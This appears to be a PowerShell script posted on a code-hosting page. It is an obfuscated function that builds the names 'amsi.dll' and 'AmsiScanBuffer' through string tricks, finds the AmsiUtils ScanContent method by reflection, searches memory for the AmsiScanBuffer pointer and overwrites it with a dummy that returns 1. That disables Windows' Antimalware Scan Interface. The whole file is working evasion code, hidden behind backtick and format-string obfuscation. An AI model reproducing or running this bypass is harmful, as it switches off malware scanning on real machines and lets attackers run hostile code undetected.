Spaces:
Runtime error
Runtime error
| function Magic { | |
| param( | |
| ${In`iti`AlsTArt} = 0x50000, | |
| ${nE`g`A`TIVeofFSET}= 0x50000, | |
| ${m`A`xOffs`et} = 0x1000000, | |
| ${reA`dByT`Es} = 0x50000 | |
| ) | |
| ${ap`Is} = @" | |
| using System; | |
| using System.ComponentModel; | |
| using System.Management.Automation; | |
| using System.Reflection; | |
| using System.Runtime.CompilerServices; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| public class APIs { | |
| [DllImport("kernel32.dll")] | |
| public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, UInt32 nSize, ref UInt32 lpNumberOfBytesRead); | |
| [DllImport("kernel32.dll")] | |
| public static extern IntPtr GetCurrentProcess(); | |
| [DllImport("kernel32", CharSet=CharSet.Ansi, ExactSpelling=true, SetLastError=true)] | |
| public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); | |
| [DllImport("kernel32.dll", CharSet=CharSet.Auto)] | |
| public static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.LPWStr)] string lpModuleName); | |
| [MethodImpl(MethodImplOptions.NoOptimization | MethodImplOptions.NoInlining)] | |
| public static int Dummy() { | |
| return 1; | |
| } | |
| } | |
| "@ | |
| Add-Type ${ap`iS} | |
| ${iNiT`I`A`lDATe}=Get-Date; | |
| ${St`R`ING} = ("{1}{2}{3}{0}"-f 'ld','h','ello, w','or') | |
| ${S`TrI`NG} = ${St`RInG}.replace('he','a') | |
| ${S`T`Ring} = ${St`R`iNg}.replace('ll','m') | |
| ${Stri`Ng} = ${S`T`Ring}.replace('o,','s') | |
| ${s`TR`iNg} = ${s`Tr`ing}.replace(' ','i') | |
| ${ST`RInG} = ${s`TR`ing}.replace('wo','.d') | |
| ${sTR`Ing} = ${ST`RIng}.replace('rld','ll') | |
| ${sT`Ri`Ng2} = ("{3}{2}{1}{0}"-f'orld','w',', ','hello') | |
| ${stRIn`g2} = ${S`Tri`Ng2}.replace('he','A') | |
| ${Stri`N`g2} = ${STr`InG2}.replace('ll','m') | |
| ${St`Ri`NG2} = ${s`TRInG2}.replace('o,','s') | |
| ${Str`I`Ng2} = ${s`TRIng2}.replace(' ','i') | |
| ${str`Ing2} = ${strIn`G2}.replace('wo','Sc') | |
| ${Str`in`G2} = ${St`Ri`NG2}.replace('rld','an') | |
| ${stri`Ng3} = ("{3}{1}{0}{2}"-f ' ','llo,','world','he') | |
| ${S`TRiN`g3} = ${s`TrIn`g3}.replace(("{0}{1}"-f'h','ello'),'Bu') | |
| ${sT`R`inG3} = ${ST`R`inG3}.replace(', ','ff') | |
| ${St`Rin`G3} = ${s`TRIn`G3}.replace(("{0}{1}" -f 'worl','d'),'er') | |
| ${Addr`E`sS} = [APIS]::GetModuleHandle(${stRi`NG}) | |
| [IntPtr] ${fU`N`CaDdR} = [APIS]::GetProcAddress(${a`dDr`EsS}, ${sT`Ri`NG2} + ${stR`iNg3}) | |
| ${a`SSEmB`lieS} = [appdomain]::currentdomain.getassemblies() | |
| ${AS`sEMBl`I`ES} | | |
| ForEach-Object { | |
| if(${_}.Location -ne ${n`ULl}){ | |
| ${spl`i`T1} = ${_}.FullName.Split(",")[0] | |
| If(${S`p`LiT1}.StartsWith('S') -And ${S`Plit1}.EndsWith('n') -And ${sPL`iT1}.Length -eq 28) { | |
| ${t`yP`es} = ${_}.GetTypes() | |
| } | |
| } | |
| } | |
| ${t`YPES} | | |
| ForEach-Object { | |
| if(${_}.Name -ne ${Nu`LL}){ | |
| If(${_}.Name.StartsWith('A') -And ${_}.Name.EndsWith('s') -And ${_}.Name.Length -eq 9) { | |
| ${Me`T`hodS} = ${_}.GetMethods([System.Reflection.BindingFlags]("{3}{0}{2}{1}" -f 'at','c,NonPublic','i','St')) | |
| } | |
| } | |
| } | |
| ${mE`TH`ods} | | |
| ForEach-Object { | |
| if(${_}.Name -ne ${N`ULL}){ | |
| If(${_}.Name.StartsWith('S') -And ${_}.Name.EndsWith('t') -And ${_}.Name.Length -eq 11) { | |
| ${METh`OD`Fo`UND} = ${_} | |
| } | |
| } | |
| } | |
| [IntPtr] ${M`eT`HO`DpOintER} = ${mEt`H`oDFouNd}.MethodHandle.GetFunctionPointer() | |
| [IntPtr] ${Han`dle} = [APIs]::GetCurrentProcess() | |
| ${D`UMmy} = 0 | |
| ${APIre`Tu`RN} = ${Fa`lSe} | |
| :initialloop for(${j} = ${I`N`ITIalSt`ArT}; ${j} -lt ${M`A`x`oFfSet}; ${J} += ${NEG`AtI`V`eO`FfSEt}){ | |
| [IntPtr] ${mE`T`ho`DpoIntEr`ToSeA`RCH} = [Int64] ${Met`H`Od`pO`iNtER} - ${j} | |
| ${Rea`dEdMeMor`y`ARraY} = [byte[]]::new(${rEAD`By`TeS}) | |
| ${A`pire`TU`Rn} = [APIs]::ReadProcessMemory(${HanD`LE}, ${m`EthOdP`o`in`TerToS`earCh}, ${Re`ADedM`EMOr`yA`RrAy}, ${r`e`ADb`ytES},[ref]${D`UMMy}) | |
| for (${I} = 0; ${I} -lt ${reaDE`DmeMO`RyaRR`AY}.Length; ${I} += 1) { | |
| ${B`yt`eS} = [byte[]](${re`Ad`edMEmorya`RRAY}[${i}], ${ReA`ded`me`moRYARrAY}[${I} + 1], ${rEADedm`eM`orYarR`AY}[${I} + 2], ${r`E`AdEd`MEmoRYa`RrAy}[${I} + 3], ${R`E`ADEdmemoRyArr`Ay}[${I} + 4], ${rE`AdedMeMOr`YARR`AY}[${I} + 5], ${ReaD`ED`MEMORYa`RRAy}[${I} + 6], ${r`ea`DED`meMOrYarRay}[${i} + 7]) | |
| [IntPtr] ${P`OI`NTertocOmp`Are} = [bitconverter]::ToInt64(${Byt`ES},0) | |
| if (${P`OI`NTeRTOc`OMPare} -eq ${fUNCa`d`dr}) { | |
| Write-Host "Found @ $($i)! " | |
| [IntPtr] ${me`M`ORytopat`CH} = [Int64] ${METhoDp`O`I`NTerTos`eAr`Ch} + ${i} | |
| break initialloop | |
| } | |
| } | |
| } | |
| [IntPtr] ${Dumm`y`pOi`NteR} = [APIs].GetMethod(("{1}{0}" -f'my','Dum')).MethodHandle.GetFunctionPointer() | |
| ${b`UF} = [IntPtr[]] (${D`Umm`YpoI`NteR}) | |
| [System.Runtime.InteropServices.Marshal]::Copy(${b`Uf}, 0, ${meMOry`ToP`AtcH}, 1) | |
| ${fI`N`ISHDA`Te}=Get-Date; | |
| ${T`ImEeLA`ps`eD} = (${Fi`NIS`hdAtE} - ${InItI`Al`D`Ate}).TotalSeconds; | |
| Write-Host ("$TimeElapsed "+'secon'+'d'+'s') | |
| } |